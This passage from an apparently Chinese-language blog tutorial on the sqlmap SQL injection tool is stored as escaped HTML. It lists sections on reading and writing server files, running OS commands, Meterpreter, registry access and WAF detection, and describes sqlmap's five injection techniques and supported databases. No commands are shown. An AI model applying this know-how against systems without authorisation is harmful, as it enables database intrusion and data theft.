class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-65\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6\" title=\"\n\t\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6 \n\">\n\t\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-66\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8A%8A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%B0%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD\" title=\"\n\t\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d \n\">\n\t\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-67\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E8%BF%90%E8%A1%8C%E4%BB%BB%E6%84%8F%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4\" title=\"\n\t\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4 \n\">\n\t\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-68\" href=\"http:\/\/weizn.net\/?p=108\/#Meterpreter%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8\" title=\"\n\tMeterpreter\u914d\u5408\u4f7f\u7528 \n\">\n\tMeterpreter\u914d\u5408\u4f7f\u7528 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-69\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%AF%B9Windows%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%93%8D%E4%BD%9C\" title=\"\n\t\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c \n\">\n\t\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-70\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AF%BB%E5%8F%96%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\" title=\"\n\t\u8bfb\u53d6\u6ce8\u518c\u8868\u503c \n\">\n\t\u8bfb\u53d6\u6ce8\u518c\u8868\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-71\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%86%99%E5%85%A5%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\" title=\"\n\t\u5199\u5165\u6ce8\u518c\u8868\u503c \n\">\n\t\u5199\u5165\u6ce8\u518c\u8868\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-72\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%A0%E9%99%A4%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\" title=\"\n\t\u5220\u9664\u6ce8\u518c\u8868\u503c \n\">\n\t\u5220\u9664\u6ce8\u518c\u8868\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-73\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%86%8C%E8%A1%A8%E8%BE%85%E5%8A%A9%E9%80%89%E9%A1%B9\" 
title=\"\n\t\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879 \n\">\n\t\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-74\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%B8%B8%E8%A7%84%E5%8F%82%E6%95%B0\" title=\"\n\t\u5e38\u89c4\u53c2\u6570 \n\">\n\t\u5e38\u89c4\u53c2\u6570 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-75\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8Esqlite%E4%B8%AD%E8%AF%BB%E5%8F%96session\" title=\"\n\t\u4ecesqlite\u4e2d\u8bfb\u53d6session \n\">\n\t\u4ecesqlite\u4e2d\u8bfb\u53d6session \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-76\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BF%9D%E5%AD%98HTTPS%E6%97%A5%E5%BF%97\" title=\"\n\t\u4fdd\u5b58HTTP(S)\u65e5\u5fd7 \n\">\n\t\u4fdd\u5b58HTTP(S)\u65e5\u5fd7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-77\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%9D%9E%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F\" title=\"\n\t\u975e\u4ea4\u4e92\u6a21\u5f0f \n\">\n\t\u975e\u4ea4\u4e92\u6a21\u5f0f \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-78\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BC%BA%E5%88%B6%E4%BD%BF%E7%94%A8%E5%AD%97%E7%AC%A6%E7%BC%96%E7%A0%81\" title=\"\n\t\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801 \n\">\n\t\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-79\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%88%AC%E8%A1%8C%E7%BD%91%E7%AB%99URL\" title=\"\n\t\u722c\u884c\u7f51\u7ad9URL \n\">\n\t\u722c\u884c\u7f51\u7ad9URL \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-80\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E8%A7%84%E5%AE%9A%E8%BE%93%E5%87%BA%E5%88%B0CSV%E4%B8%AD%E7%9A%84%E5%88%86%E9%9A%94%E7%AC%A6\" title=\"\n\t\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26 \n\">\n\t\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-81\" href=\"http:\/\/weizn.net\/?p=108\/#DBMS%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81\" title=\"\n\tDBMS\u8eab\u4efd\u9a8c\u8bc1 \n\">\n\tDBMS\u8eab\u4efd\u9a8c\u8bc1 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-82\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%AE%9A%E4%B9%89dump%E6%95%B0%E6%8D%AE%E7%9A%84%E6%A0%BC%E5%BC%8F\" title=\"\n\t\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f \n\">\n\t\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-83\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A2%84%E4%BC%B0%E5%AE%8C%E6%88%90%E6%97%B6%E9%97%B4\" title=\"\n\t\u9884\u4f30\u5b8c\u6210\u65f6\u95f4 \n\">\n\t\u9884\u4f30\u5b8c\u6210\u65f6\u95f4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-84\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%B7%E6%96%B0session%E6%96%87%E4%BB%B6\" title=\"\n\t\u5237\u65b0session\u6587\u4ef6 \n\">\n\t\u5237\u65b0session\u6587\u4ef6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-85\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%87%AA%E5%8A%A8%E8%8E%B7%E5%8F%96form%E8%A1%A8%E5%8D%95%E6%B5%8B%E8%AF%95\" title=\"\n\t\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5 \n\">\n\t\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-86\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E5%BF%BD%E7%95%A5%E5%9C%A8%E4%BC%9A%E8%AF%9D%E6%96%87%E4%BB%B6%E4%B8%AD%E5%AD%98%E5%82%A8%E7%9A%84%E6%9F%A5%E8%AF%A2%E7%BB%93%E6%9E%9C\" title=\"\n\t\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c \n\">\n\t\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-87\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8DBMS%E7%9A%84hex%E5%87%BD%E6%95%B0\" title=\"\n\t\u4f7f\u7528DBMS\u7684hex\u51fd\u6570 \n\">\n\t\u4f7f\u7528DBMS\u7684hex\u51fd\u6570 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-88\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%87%AA%E5%AE%9A%E4%B9%89%E8%BE%93%E5%87%BA%E7%9A%84%E8%B7%AF%E5%BE%84\" title=\"\n\t\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84 \n\">\n\t\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-89\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E5%93%8D%E5%BA%94%E4%B8%AD%E8%8E%B7%E5%8F%96DBMS%E7%9A%84%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF\" title=\"\n\t\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f \n\">\n\t\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-90\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%85%B6%E4%BB%96%E7%9A%84%E4%B8%80%E4%BA%9B%E5%8F%82%E6%95%B0\" title=\"\n\t\u5176\u4ed6\u7684\u4e00\u4e9b\u53c2\u6570 \n\">\n\t\u5176\u4ed6\u7684\u4e00\u4e9b\u53c2\u6570 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-91\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8%E5%8F%82%E6%95%B0%E7%BC%A9%E5%86%99\" 
title=\"\n\t\u4f7f\u7528\u53c2\u6570\u7f29\u5199 \n\">\n\t\u4f7f\u7528\u53c2\u6570\u7f29\u5199 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-92\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%88%90%E5%8A%9FSQL%E6%B3%A8%E5%85%A5%E6%97%B6%E8%AD%A6%E5%91%8A\" title=\"\n\t\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a&nbsp; \n\">\n\t\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a&nbsp; \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-93\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E4%BC%9A%E5%8F%91%E7%9A%84%E7%AD%94%E6%A1%88\" title=\"\n\t\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848 \n\">\n\t\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-94\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%8F%91%E7%8E%B0SQL%E6%B3%A8%E5%85%A5%E6%97%B6%E5%8F%91%E5%87%BA%E8%9C%82%E9%B8%A3%E5%A3%B0\" title=\"\n\t\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0 \n\">\n\t\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-95\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%90%AF%E5%8F%91%E5%BC%8F%E6%A3%80%E6%B5%8BWAFIPSIDS%E4%BF%9D%E6%8A%A4\" title=\"\n\t\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4 \n\">\n\t\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-96\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B8%85%E7%90%86sqlmap%E7%9A%84UDFs%E5%92%8C%E8%A1%A8\" title=\"\n\t\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868 \n\">\n\t\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-97\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%A6%81%E7%94%A8%E5%BD%A9%E8%89%B2%E8%BE%93%E5%87%BA\" 
title=\"\n\t\u7981\u7528\u5f69\u8272\u8f93\u51fa \n\">\n\t\u7981\u7528\u5f69\u8272\u8f93\u51fa \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-98\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8%E6%8C%87%E5%AE%9A%E7%9A%84Google%E7%BB%93%E6%9E%9C%E9%A1%B5%E9%9D%A2\" title=\"\n\t\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762 \n\">\n\t\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-99\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8HTTP%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93\" title=\"\n\t\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3 \n\">\n\t\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-100\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B5%8B%E8%AF%95WAFIPSIDS%E4%BF%9D%E6%8A%A4\" title=\"\n\t\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4 \n\">\n\t\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-101\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%A8%A1%E4%BB%BF%E6%99%BA%E8%83%BD%E6%89%8B%E6%9C%BA\" title=\"\n\t\u6a21\u4eff\u667a\u80fd\u624b\u673a \n\">\n\t\u6a21\u4eff\u667a\u80fd\u624b\u673a \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-102\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%AE%89%E5%85%A8%E7%9A%84%E5%88%A0%E9%99%A4output%E7%9B%AE%E5%BD%95%E7%9A%84%E6%96%87%E4%BB%B6\" title=\"\n\t\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6 \n\">\n\t\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-103\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%90%AF%E5%8F%91%E5%BC%8F%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5\" 
title=\"\n\t\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165 \n\">\n\t\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-104\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%9D%E7%BA%A7%E7%94%A8%E6%88%B7%E5%90%91%E5%AF%BC%E5%8F%82%E6%95%B0\" title=\"\n\t\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570 \n\">\n\t\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570 \n<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u7ed9<span>sqlmap<\/span><span>\u8fd9\u4e48\u4e00\u4e2a<\/span><span>url<\/span><span>\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u6570<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cd<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u5165<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e93<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">4<span>\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u57fa\u4e8e\u62a5\u9519\u6ce8\u5165\uff0c\u5373\u9875\u9762\u4f1a\u8fd4\u56de\u9519\u8bef\u4fe1\u606f\uff0c\u6216\u8005\u628a\u6ce8\u5165\u7684\u8bed\u53e5\u7684\u7ed3\u679c\u76f4\u63a5\u8fd4\u56de\u5728\u9875\u9762\u4e2d\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528<\/span><span>union<\/span><span>\u7684\u60c5\u51b5\u4e0b\u7684\u6ce8\u5165\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">5<span>\u3001\u5806\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u7684\u6267\u884c\u65f6\u7684\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">MySQL,&nbsp;Oracle,&nbsp;PostgreSQL,&nbsp;Microsoft&nbsp;SQL&nbsp;Server,&nbsp;Microsoft&nbsp;Access,&nbsp;IBM&nbsp;DB2,&nbsp;SQLite,&nbsp;Firebird,&nbsp;Sybase<span>\u548c<\/span><span>SAP&nbsp;MaxDB<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53ef\u4ee5\u63d0\u4f9b\u4e00\u4e2a\u7b80\u5355\u7684<span>URL<\/span><span>\uff0c<\/span><span>Burp<\/span><span>\u6216<\/span><span>WebScarab<\/span><span>\u8bf7\u6c42\u65e5\u5fd7\u6587\u4ef6\uff0c\u6587\u672c\u6587\u6863\u4e2d\u7684\u5b8c\u6574<\/span><span>http<\/span><span>\u8bf7\u6c42\u6216\u8005<\/span><span>Google<\/span><span>\u7684\u641c\u7d22\uff0c\u5339\u914d\u51fa\u7ed3\u679c\u9875\u9762\uff0c\u4e5f\u53ef\u4ee5\u81ea\u5df1\u5b9a\u4e49\u4e00\u4e2a\u6b63\u5219\u6765\u5224\u65ad\u54ea\u4e2a\u5730\u5740\u53bb\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6d4b\u8bd5<span>GET<\/span><span>\u53c2\u6570\uff0c<\/span><span>POST<\/span><span>\u53c2\u6570\uff0c<\/span><span>HTTP&nbsp;Cookie<\/span><span>\u53c2\u6570\uff0c<\/span><span>HTTP&nbsp;User-Agent<\/span><span>\u5934\u548c<\/span><span>HTTP&nbsp;Referer<\/span><span>\u5934\u6765\u786e\u8ba4\u662f\u5426\u6709<\/span><span>SQL<\/span><span>\u6ce8\u5165\uff0c\u5b83\u4e5f\u53ef\u4ee5\u6307\u5b9a\u7528\u9017\u53f7\u5206\u9694\u7684\u5217\u8868\u7684\u5177\u4f53\u53c2\u6570\u6765\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a<span>HTTP(S)<\/span><span>\u8bf7\u6c42\u7684\u5e76\u53d1\u6570\uff0c\u6765\u63d0\u9ad8\u76f2\u6ce8\u65f6\u7684\u6548\u7387\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">Youtube<span>\u4e0a\u6709\u4eba\u505a\u7684\u4f7f\u7528<\/span><span>sqlmap<\/span><span>\u7684\u89c6\u9891\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p 
class=\"p18\">\n\t<span><a href=\"http:\/\/www.youtube.com\/user\/inquisb\/videos\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">http:\/\/www.youtube.com\/user\/inquisb\/videos<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span><a href=\"http:\/\/www.youtube.com\/user\/stamparm\/videos\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">http:\/\/www.youtube.com\/user\/stamparm\/videos<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f7f\u7528<span>sqlmap<\/span><span>\u7684\u5b9e\u4f8b\u6587\u7ae0\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span><a href=\"http:\/\/unconciousmind.blogspot.com\/search\/label\/sqlmap\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">http:\/\/unconciousmind.blogspot.com\/search\/label\/sqlmap<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u70b9\u51fb<\/span><span><a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\/tarball\/master\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New 